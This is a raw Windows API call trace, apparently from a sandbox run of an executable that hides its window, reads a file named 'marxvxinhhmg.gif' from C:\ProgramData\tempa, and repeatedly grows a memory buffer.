[0137.936] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x701e4
[0137.940] SetWindowLongA (hWnd=0x701e4, nIndex=-4, dwNewLong=397295) returned 4219500
[0137.940] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0137.940] SendMessageA (hWnd=0x701e4, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0137.940] DefWindowProcA (hWnd=0x701e4, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0137.951] DefWindowProcA (hWnd=0x701e4, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x6020d
[0137.952] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0137.952] SetClassLongA (hWnd=0x701e4, nIndex=-14, dwNewLong=65575) returned 0x0
[0137.952] GetSystemMenu (hWnd=0x701e4, bRevert=0) returned 0x801b9
[0137.954] DeleteMenu (hMenu=0x801b9, uPosition=0xf030, uFlags=0x0) returned 1
[0137.954] DeleteMenu (hMenu=0x801b9, uPosition=0xf000, uFlags=0x0) returned 1
[0137.954] DeleteMenu (hMenu=0x801b9, uPosition=0xf010, uFlags=0x0) returned 1
[0137.955] GetKeyboardLayoutList (in: nBuff=64, lpList=0xef7b0 | out: lpList=0xef7b0) returned 1
[0137.956] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0137.956] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0137.956] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d7b0000
[0137.957] GetProcAddress (hModule=0x6d7b0000, lpProcName="InitializeFlatSB") returned 0x6d7e266f
[0137.957] GetProcAddress (hModule=0x6d7b0000, lpProcName="UninitializeFlatSB") returned 0x6d7e2542
[0137.957] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollProp") returned 0x6d7e1d29
[0137.957] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollProp") returned 0x6d7e238d
[0137.957] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7e20c9
[0137.957] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d7e1fdb
[0137.957] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollRange") returned 0x6d7e1e8d
[0137.957] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d7e1f0f
[0137.957] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollPos") returned 0x6d7e1ccd
[0137.957] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollPos") returned 0x6d7e216d
[0137.957] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7e22be
[0137.957] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7e21e2
[0137.957] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0137.957] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0137.958] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0137.958] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0137.958] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0137.958] GetCurrentThreadId () returned 0x8a0
[0137.958] GlobalAddAtomA (lpString="WndProcPtr00400000000008A0") returned 0xc123
[0137.958] VirtualAlloc (lpAddress=0x12d4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x12d4000
[0137.958] ShowWindow (hWnd=0x701e4, nCmdShow=0) returned 0
[0137.958] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0137.958] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0137.959] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0xef530*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xef530*=0) returned 0x0
[0137.959] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0xef528*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xef528*=0) returned 0x0
[0137.959] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0xef528*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xef528*=0) returned 0x10be00
[0137.959] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0xef528*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xef528*=0) returned 0x0
[0137.959] GlobalLock (hMem=0x330004) returned 0x1560020
[0137.959] ReadFile (in: hFile=0x98, lpBuffer=0x1560020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0xef544, lpOverlapped=0x0 | out: lpBuffer=0x1560020*, lpNumberOfBytesRead=0xef544*=0x10be00, lpOverlapped=0x0) returned 1
[0138.030] CloseHandle (hObject=0x98) returned 1
[0138.030] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.031] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.031] GlobalUnlock (hMem=0x33000c) returned 0
[0138.031] GlobalReAlloc (hMem=0x33000c, dwBytes=0x4000, uFlags=0x2) returned 0x33000c
[0138.031] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.032] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.032] GlobalUnlock (hMem=0x33000c) returned 0
[0138.032] GlobalReAlloc (hMem=0x33000c, dwBytes=0x6000, uFlags=0x2) returned 0x33000c
[0138.032] GlobalLock (hMem=0x33000c) returned 0x5ea820
[0138.033] GlobalHandle (pMem=0x5ea820) returned 0x33000c
[0138.033] GlobalUnlock (hMem=0x33000c) returned 0
[0138.033] GlobalReAlloc (hMem=0x33000c, dwBytes=0x8000, uFlags=0x2) returned 0x33000c
[0138.034] GlobalLock (hMem=0x33000c) returned 0x5f0830
[0138.034] GlobalHandle (pMem=0x5f0830) returned 0x33000c
[0138.034] GlobalUnlock (hMem=0x33000c) returned 0
[0138.034] GlobalReAlloc (hMem=0x33000c, dwBytes=0xa000, uFlags=0x2) returned 0x33000c
[0138.035] GlobalLock (hMem=0x33000c) returned 0x5f0830
[0138.035] GlobalHandle (pMem=0x5f0830) returned 0x33000c
[0138.035] GlobalUnlock (hMem=0x33000c) returned 0
[0138.035] GlobalReAlloc (hMem=0x33000c, dwBytes=0xc000, uFlags=0x2) returned 0x33000c
[0138.036] GlobalLock (hMem=0x33000c) returned 0x5fa840
[0138.037] GlobalHandle (pMem=0x5fa840) returned 0x33000c
[0138.037] GlobalUnlock (hMem=0x33000c) returned 0
[0138.037] GlobalReAlloc (hMem=0x33000c, dwBytes=0xe000, uFlags=0x2) returned 0x33000c
[0138.037] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.037] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.037] GlobalUnlock (hMem=0x33000c) returned 0
[0138.037] GlobalReAlloc (hMem=0x33000c, dwBytes=0x10000, uFlags=0x2) returned 0x33000c
[0138.037] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.038] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.038] GlobalUnlock (hMem=0x33000c) returned 0
[0138.038] GlobalReAlloc (hMem=0x33000c, dwBytes=0x12000, uFlags=0x2) returned 0x33000c
[0138.038] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.039] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.039] GlobalUnlock (hMem=0x33000c) returned 0
[0138.039] GlobalReAlloc (hMem=0x33000c, dwBytes=0x14000, uFlags=0x2) returned 0x33000c
[0138.039] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.040] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.040] GlobalUnlock (hMem=0x33000c) returned 0
[0138.040] GlobalReAlloc (hMem=0x33000c, dwBytes=0x16000, uFlags=0x2) returned 0x33000c
[0138.040] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.040] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.040] GlobalUnlock (hMem=0x33000c) returned 0
[0138.040] GlobalReAlloc (hMem=0x33000c, dwBytes=0x18000, uFlags=0x2) returned 0x33000c
[0138.041] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.041] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.041] GlobalUnlock (hMem=0x33000c) returned 0
[0138.041] GlobalReAlloc (hMem=0x33000c, dwBytes=0x1a000, uFlags=0x2) returned 0x33000c
[0138.041] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.042] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.042] GlobalUnlock (hMem=0x33000c) returned 0
[0138.042] GlobalReAlloc (hMem=0x33000c, dwBytes=0x1c000, uFlags=0x2) returned 0x33000c
[0138.042] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.043] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.043] GlobalUnlock (hMem=0x33000c) returned 0
[0138.043] GlobalReAlloc (hMem=0x33000c, dwBytes=0x1e000, uFlags=0x2) returned 0x33000c
[0138.043] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.043] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.043] GlobalUnlock (hMem=0x33000c) returned 0
[0138.043] GlobalReAlloc (hMem=0x33000c, dwBytes=0x20000, uFlags=0x2) returned 0x33000c
[0138.043] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.044] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.044] GlobalUnlock (hMem=0x33000c) returned 0
[0138.044] GlobalReAlloc (hMem=0x33000c, dwBytes=0x22000, uFlags=0x2) returned 0x33000c
[0138.046] GlobalLock (hMem=0x33000c) returned 0x606820
[0138.047] GlobalHandle (pMem=0x606820) returned 0x33000c
[0138.047] GlobalUnlock (hMem=0x33000c) returned 0
[0138.047] GlobalReAlloc (hMem=0x33000c, dwBytes=0x24000, uFlags=0x2) returned 0x33000c
[0138.047] GlobalLock (hMem=0x33000c) returned 0x606820
[0138.047] GlobalHandle (pMem=0x606820) returned 0x33000c
[0138.047] GlobalUnlock (hMem=0x33000c) returned 0
[0138.047] GlobalReAlloc (hMem=0x33000c, dwBytes=0x26000, uFlags=0x2) returned 0x33000c
[0138.049] GlobalLock (hMem=0x33000c) returned 0x62a830
[0138.050] GlobalHandle (pMem=0x62a830) returned 0x33000c
[0138.050] GlobalUnlock (hMem=0x33000c) returned 0
[0138.050] GlobalReAlloc (hMem=0x33000c, dwBytes=0x28000, uFlags=0x2) returned 0x33000c
[0138.050] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.051] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.051] GlobalUnlock (hMem=0x33000c) returned 0
[0138.051] GlobalReAlloc (hMem=0x33000c, dwBytes=0x2a000, uFlags=0x2) returned 0x33000c
[0138.051] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.052] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.052] GlobalUnlock (hMem=0x33000c) returned 0
[0138.052] GlobalReAlloc (hMem=0x33000c, dwBytes=0x2c000, uFlags=0x2) returned 0x33000c
[0138.052] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.052] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.052] GlobalUnlock (hMem=0x33000c) returned 0
[0138.052] GlobalReAlloc (hMem=0x33000c, dwBytes=0x2e000, uFlags=0x2) returned 0x33000c
[0138.052] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.100] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.100] GlobalUnlock (hMem=0x33000c) returned 0
[0138.100] GlobalReAlloc (hMem=0x33000c, dwBytes=0x30000, uFlags=0x2) returned 0x33000c
[0138.100] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.101] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.101] GlobalUnlock (hMem=0x33000c) returned 0
[0138.101] GlobalReAlloc (hMem=0x33000c, dwBytes=0x32000, uFlags=0x2) returned 0x33000c
[0138.101] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.102] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.102] GlobalUnlock (hMem=0x33000c) returned 0
[0138.102] GlobalReAlloc (hMem=0x33000c, dwBytes=0x34000, uFlags=0x2) returned 0x33000c
[0138.102] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.102] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.102] GlobalUnlock (hMem=0x33000c) returned 0
[0138.102] GlobalReAlloc (hMem=0x33000c, dwBytes=0x36000, uFlags=0x2) returned 0x33000c
[0138.102] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.103] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.103] GlobalUnlock (hMem=0x33000c) returned 0
[0138.103] GlobalReAlloc (hMem=0x33000c, dwBytes=0x38000, uFlags=0x2) returned 0x33000c
[0138.103] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.104] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.104] GlobalUnlock (hMem=0x33000c) returned 0
[0138.104] GlobalReAlloc (hMem=0x33000c, dwBytes=0x3a000, uFlags=0x2) returned 0x33000c
[0138.104] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.105] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.105] GlobalUnlock (hMem=0x33000c) returned 0
[0138.105] GlobalReAlloc (hMem=0x33000c, dwBytes=0x3c000, uFlags=0x2) returned 0x33000c
[0138.105] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.105] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.105] GlobalUnlock (hMem=0x33000c) returned 0
[0138.105] GlobalReAlloc (hMem=0x33000c, dwBytes=0x3e000, uFlags=0x2) returned 0x33000c
[0138.105] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.106] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.106] GlobalUnlock (hMem=0x33000c) returned 0
[0138.106] GlobalReAlloc (hMem=0x33000c, dwBytes=0x40000, uFlags=0x2) returned 0x33000c
[0138.106] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.107] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.107] GlobalUnlock (hMem=0x33000c) returned 0
[0138.107] GlobalReAlloc (hMem=0x33000c, dwBytes=0x42000, uFlags=0x2) returned 0x33000c
[0138.107] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.108] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.108] GlobalUnlock (hMem=0x33000c) returned 0
[0138.108] GlobalReAlloc (hMem=0x33000c, dwBytes=0x44000, uFlags=0x2) returned 0x33000c
[0138.108] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.109] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.109] GlobalUnlock (hMem=0x33000c) returned 0
[0138.109] GlobalReAlloc (hMem=0x33000c, dwBytes=0x46000, uFlags=0x2) returned 0x33000c
[0138.109] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.109] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.109] GlobalUnlock (hMem=0x33000c) returned 0
[0138.110] GlobalReAlloc (hMem=0x33000c, dwBytes=0x48000, uFlags=0x2) returned 0x33000c
[0138.110] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.110] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.110] GlobalUnlock (hMem=0x33000c) returned 0
[0138.110] GlobalReAlloc (hMem=0x33000c, dwBytes=0x4a000, uFlags=0x2) returned 0x33000c
[0138.110] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.111] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.111] GlobalUnlock (hMem=0x33000c) returned 0
[0138.111] GlobalReAlloc (hMem=0x33000c, dwBytes=0x4c000, uFlags=0x2) returned 0x33000c
[0138.111] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.112] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.112] GlobalUnlock (hMem=0x33000c) returned 0
[0138.112] GlobalReAlloc (hMem=0x33000c, dwBytes=0x4e000, uFlags=0x2) returned 0x33000c
[0138.112] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.113] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.113] GlobalUnlock (hMem=0x33000c) returned 0
[0138.113] GlobalReAlloc (hMem=0x33000c, dwBytes=0x50000, uFlags=0x2) returned 0x33000c
[0138.113] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.113] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.113] GlobalUnlock (hMem=0x33000c) returned 0
[0138.113] GlobalReAlloc (hMem=0x33000c, dwBytes=0x52000, uFlags=0x2) returned 0x33000c
[0138.114] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.114] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.114] GlobalUnlock (hMem=0x33000c) returned 0
[0138.114] GlobalReAlloc (hMem=0x33000c, dwBytes=0x54000, uFlags=0x2) returned 0x33000c
[0138.114] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.115] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.115] GlobalUnlock (hMem=0x33000c) returned 0
[0138.115] GlobalReAlloc (hMem=0x33000c, dwBytes=0x56000, uFlags=0x2) returned 0x33000c
[0138.115] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.116] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.116] GlobalUnlock (hMem=0x33000c) returned 0
[0138.116] GlobalReAlloc (hMem=0x33000c, dwBytes=0x58000, uFlags=0x2) returned 0x33000c
[0138.116] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.117] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.117] GlobalUnlock (hMem=0x33000c) returned 0
[0138.117] GlobalReAlloc (hMem=0x33000c, dwBytes=0x5a000, uFlags=0x2) returned 0x33000c
[0138.117] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.118] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.118] GlobalUnlock (hMem=0x33000c) returned 0
[0138.118] GlobalReAlloc (hMem=0x33000c, dwBytes=0x5c000, uFlags=0x2) returned 0x33000c
[0138.118] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.118] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.118] GlobalUnlock (hMem=0x33000c) returned 0
[0138.118] GlobalReAlloc (hMem=0x33000c, dwBytes=0x5e000, uFlags=0x2) returned 0x33000c
[0138.118] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.119] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.119] GlobalUnlock (hMem=0x33000c) returned 0
[0138.119] GlobalReAlloc (hMem=0x33000c, dwBytes=0x60000, uFlags=0x2) returned 0x33000c
[0138.119] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.120] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.120] GlobalUnlock (hMem=0x33000c) returned 0
[0138.120] GlobalReAlloc (hMem=0x33000c, dwBytes=0x62000, uFlags=0x2) returned 0x33000c
[0138.120] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.121] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.121] GlobalUnlock (hMem=0x33000c) returned 0
[0138.121] GlobalReAlloc (hMem=0x33000c, dwBytes=0x64000, uFlags=0x2) returned 0x33000c
[0138.121] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.121] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.121] GlobalUnlock (hMem=0x33000c) returned 0
[0138.121] GlobalReAlloc (hMem=0x33000c, dwBytes=0x66000, uFlags=0x2) returned 0x33000c
[0138.121] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.122] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.122] GlobalUnlock (hMem=0x33000c) returned 0
[0138.122] GlobalReAlloc (hMem=0x33000c, dwBytes=0x68000, uFlags=0x2) returned 0x33000c
[0138.122] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.123] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.123] GlobalUnlock (hMem=0x33000c) returned 0
[0138.123] GlobalReAlloc (hMem=0x33000c, dwBytes=0x6a000, uFlags=0x2) returned 0x33000c
[0138.123] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.123] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.124] GlobalUnlock (hMem=0x33000c) returned 0
[0138.124] GlobalReAlloc (hMem=0x33000c, dwBytes=0x6c000, uFlags=0x2) returned 0x33000c
[0138.129] GlobalLock (hMem=0x33000c) returned 0x650820
[0138.130] GlobalHandle (pMem=0x650820) returned 0x33000c
[0138.130] GlobalUnlock (hMem=0x33000c) returned 0
[0138.130] GlobalReAlloc (hMem=0x33000c, dwBytes=0x6e000, uFlags=0x2) returned 0x33000c
[0138.130] GlobalLock (hMem=0x33000c) returned 0x650820
[0138.130] GlobalHandle (pMem=0x650820) returned 0x33000c
[0138.130] GlobalUnlock (hMem=0x33000c) returned 0
[0138.130] GlobalReAlloc (hMem=0x33000c, dwBytes=0x70000, uFlags=0x2) returned 0x33000c
[0138.144] GlobalLock (hMem=0x33000c) returned 0x2490048
[0138.145] GlobalHandle (pMem=0x2490048) returned 0x33000c
[0138.145] GlobalUnlock (hMem=0x33000c) returned 0
[0138.145] GlobalReAlloc (hMem=0x33000c, dwBytes=0x72000, uFlags=0x2) returned 0x33000c
[0138.197] GlobalLock (hMem=0x33000c) returned 0x2500058
[0138.198] GlobalHandle (pMem=0x2500058) returned 0x33000c
[0138.198] GlobalUnlock (hMem=0x33000c) returned 0
[0138.198] GlobalReAlloc (hMem=0x33000c, dwBytes=0x74000, uFlags=0x2) returned 0x33000c
[0138.198] GlobalLock (hMem=0x33000c) returned 0x2500058
[0138.199] GlobalHandle (pMem=0x2500058) returned 0x33000c
[0138.199] GlobalUnlock (hMem=0x33000c) returned 0
[0138.199] GlobalReAlloc (hMem=0x33000c, dwBytes=0x76000, uFlags=0x2) returned 0x33000c
[0138.212] GlobalLock (hMem=0x33000c) returned 0x5e6810
[0138.213] GlobalHandle (pMem=0x5e6810) returned 0x33000c
[0138.213] GlobalUnlock (hMem=0x33000c) returned 0
[0138.213] GlobalReAlloc (hMem=0x33000c, dwBytes=0x78000, uFlags=0x2) returned 0x33000c
[0138.220] GlobalLock (hMem=0x33000c) returned 0x2490048
[0138.220] GlobalHandle (pMem=0x2490048) returned 0x33000c
[0138.220] GlobalUnlock (hMem=0x33000c) returned 0
[0138.220] GlobalReAlloc (hMem=0x33000c, dwBytes=0x7a000, uFlags=0x2) returned 0x33000c
[0138.227] GlobalLock (hMem=0x33000c) returned 0x2508058
[0138.228] GlobalHandle (pMem=0x2508058) returned 0x33000c
[0138.228] GlobalUnlock (hMem=0x33000c) returned 0
[0138.228] GlobalReAlloc (hMem=0x33000c, dwBytes=0x7c000, uFlags=0x2) returned 0x33000c
[0138.228] GlobalLock (hMem=0x33000c) returned 0x2508058
[0138.228] GlobalHandle (pMem=0x2508058) returned 0x33000c
[0138.228] GlobalUnlock (hMem=0x33000c) returned 0
[0138.228] GlobalReAlloc (hMem=0x33000c, dwBytes=0x7e000, uFlags=0x2) returned 0x33000c
[0138.290] GlobalLock (hMem=0x33000c) returned 0x2590048
[0138.291] GlobalHandle (pMem=0x2590048) returned 0x33000c
[0138.291] GlobalUnlock (hMem=0x33000c) returned 0
[0138.291] GlobalReAlloc (hMem=0x33000c, dwBytes=0x80000, uFlags=0x2) returned 0x33000c
[0138.307] GlobalLock (hMem=0x33000c) returned 0x13d0020
[0138.308] GlobalHandle (pMem=0x13d0020) returned 0x33000c
[0138.308] GlobalUnlock (hMem=0x33000c) returned 0
[0138.308] GlobalReAlloc (hMem=0x33000c, dwBytes=0x82000, uFlags=0x2) returned 0x33000c
[0138.318] GlobalLock (hMem=0x33000c) returned 0x1670020
[0138.319] GlobalHandle (pMem=0x1670020) returned 0x33000c
[0138.319] GlobalUnlock (hMem=0x33000c) returned 0
[0138.320] GlobalReAlloc (hMem=0x33000c, dwBytes=0x84000, uFlags=0x2) returned 0x33000c
[0138.330] GlobalLock (hMem=0x33000c) returned 0x13d0020
[0138.331] GlobalHandle (pMem=0x13d0020) returned 0x33000c
[0138.331] GlobalUnlock (hMem=0x33000c) returned 0
[0138.331] GlobalReAlloc (hMem=0x33000c, dwBytes=0x86000, uFlags=0x2) returned 0x33000c
[0138.389] GlobalLock (hMem=0x33000c) returned 0x1670020
[0138.390] GlobalHandle (pMem=0x1670020) returned 0x33000c
[0138.390] GlobalUnlock (hMem=0x33000c) returned 0
[0138.390] GlobalReAlloc (hMem=0x33000c, dwBytes=0x88000, uFlags=0x2) returned 0x33000c
[0138.401] GlobalLock (hMem=0x33000c) returned 0x13d0020
[0138.402] GlobalHandle (pMem=0x13d0020) returned 0x33000c
[0138.402] GlobalUnlock (hMem=0x33000c) returned 0
[0138.402] GlobalReAlloc (hMem=0x33000c, dwBytes=0x8a000, uFlags=0x2) returned 0x33000c
[0138.416] GlobalLock (hMem=0x33000c) returned 0x1670020
[0138.417] GlobalHandle (pMem=0x1670020) returned 0x33000c
[0138.417] GlobalUnlock (hMem=0x33000c) returned 0
[0138.417] GlobalReAlloc (hMem=0x33000c, dwBytes=0x8c000, uFlags=0x2) returned 0x33000c
[0138.428] GlobalLock (hMem=0x33000c) returned 0x13d0020
[0138.429] GlobalHandle (pMem=0x13d0020) returned 0x33000c
[0138.429] GlobalUnlock (hMem=0x33000c) returned 0
[0138.429] GlobalReAlloc (hMem=0x33000c, dwBytes=0x8e000, uFlags=0x2) returned 0x33000c
[0138.485] GlobalLock (hMem=0x33000c) returned 0x1670020
[0138.486] GlobalHandle (pMem=0x1670020) returned 0x33000c
[0138.486] GlobalUnlock (hMem=0x33000c) returned 0
[0138.486] GlobalReAlloc (hMem=0x33000c, dwBytes=0x90000, uFlags=0x2) returned 0x33000c
[0138.498] GlobalLock (hMem=0x33000c) returned 0x13d0020
[0138.499] GlobalHandle (pMem=0x13d0020) returned 0x33000c
[0138.499] GlobalUnlock (hMem=0x33000c) returned 0
[0138.499] GlobalReAlloc (hMem=0x33000c, dwBytes=0x92000, uFlags=0x2) returned 0x33000c
[0138.511] GlobalLock (hMem=0x33000c) returned 0x1670020
[0138.512] GlobalHandle (pMem=0x1670020) returned 0x33000c
[0138.512] GlobalUnlock (hMem=0x33000c) returned 0
[0138.512] GlobalReAlloc (hMem=0x33000c, dwBytes=0x94000, uFlags=0x2) returned 0x33000c
[0138.571] GlobalLock (hMem=0x33000c) returned 0x13d0020
[0138.572] GlobalHandle (pMem=0x13d0020) returned 0x33000c
[0138.572] GlobalUnlock (hMem=0x33000c) returned 0
[0138.572] GlobalReAlloc (hMem=0x33000c, dwBytes=0x96000, uFlags=0x2) returned 0x33000c
[0138.584] GlobalLock (hMem=0x33000c) returned 0x1670020
[0138.585] GlobalHandle (pMem=0x1670020) returned 0x33000c
[0138.585] GlobalUnlock (hMem=0x33000c) returned 0
[0138.585] GlobalReAlloc (hMem=0x33000c, dwBytes=0x98000, uFlags=0x2) returned 0x33000c
[0138.597] GlobalLock (hMem=0x33000c) returned 0x13d0020
[0138.598] GlobalHandle (pMem=0x13d0020) returned 0x33000c
[0138.598] GlobalUnlock (hMem=0x33000c) returned 0
[0138.598] GlobalReAlloc (hMem=0x33000c, dwBytes=0x9a000, uFlags=0x2) returned 0x33000c
[0138.610] GlobalLock (hMem=0x33000c) returned 0x1670020
[0138.611] GlobalHandle (pMem=0x1670020) returned 0x33000c
[0138.611] GlobalUnlock (hMem=0x33000c) returned 0
[0138.611] GlobalReAlloc (hMem=0x33000c, dwBytes=0x9c000, uFlags=0x2) returned 0x33000c
[0138.673] GlobalLock (hMem=0x33000c) returned 0x13d0020
[0138.674] GlobalHandle (pMem=0x13d0020) returned 0x33000c
[0138.674] GlobalUnlock (hMem=0x33000c) returned 0
[0138.674] GlobalReAlloc (hMem=0x33000c, dwBytes=0x9e000, uFlags=0x2) returned 0x33000c
[0138.687] GlobalLock (hMem=0x33000c) returned 0x1670020
[0138.688] GlobalHandle (pMem=0x1670020) returned 0x33000c
[0138.688] GlobalUnlock (hMem=0x33000c) returned 0
[0138.688] GlobalReAlloc (hMem=0x33000c, dwBytes=0xa0000, uFlags=0x2) returned 0x33000c
[0138.701] GlobalLock (hMem=0x33000c) returned 0x2790020
[0138.702] GlobalHandle (pMem=0x2790020) returned 0x33000c
[0138.702] GlobalUnlock (hMem=0x33000c) returned 0
[0138.702] GlobalReAlloc (hMem=0x33000c, dwBytes=0xa2000, uFlags=0x2) returned 0x33000c
[0138.763] GlobalLock (hMem=0x33000c) returned 0x1670020
